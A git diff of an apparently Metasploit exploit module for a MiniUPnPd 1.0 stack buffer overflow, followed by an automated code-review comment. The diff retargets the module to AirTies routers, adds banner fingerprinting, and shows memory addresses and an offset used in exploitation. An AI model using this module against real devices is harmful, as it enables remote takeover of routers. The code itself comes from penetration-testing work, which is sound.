fingerprint, title
parent
285d767e20
commit
8db88994ac
|
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
|
||||
'Name' => 'AirTies MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
|
||||
present in the SOAPAction HTTP header handling.
|
||||
|
@ -42,7 +42,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Offset' => 2048,
|
||||
'LibcBase' => 0x2aabd000,
|
||||
'System' => 0x00031AC0,
|
||||
'CallSystem' => 0x0001CC94 # prepare $a0 and jump to $s0
|
||||
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
|
||||
'ServerHeader' => "AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0" # Fingerprint
|
||||
}
|
||||
],
|
||||
],
|
||||
|
@ -62,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => "/",
|
||||
})
|
||||
|
||||
if res && res.headers['Server'] =~ /miniupnpd\/1.0/
|
||||
if res && res.headers['Server'] == target['ServerHeader']
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
|
@ -74,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
print_status("#{peer} - Accessing the vulnerable URL...")
|
||||
print_status(target['ServerHeader'])
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
|
||||
|
|
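Review bot: The added `print_status(target['ServerHeader'])` at the top of `exploit` reads like leftover debug output: it lacks the `#{peer} -` prefix used by the line above it, and it prints an empty line when the selected target has no 'ServerHeader' key. Only one target entry is shown gaining that key in the second hunk, so if other targets exist, the new comparison in `check` (`res.headers['Server'] == target['ServerHeader']`) would compare against nil for them and never report Detected; I would guard it with `expected = target['ServerHeader']` followed by `if res && expected && res.headers['Server'] == expected`. If the expected banner is worth showing, `vprint_status("#{peer} - Expecting Server header: #{target['ServerHeader']}")` keeps it out of normal output. The bodies of `check` and `exploit` continue outside these hunks, so the full targets list and any automatic-target handling should be confirmed there.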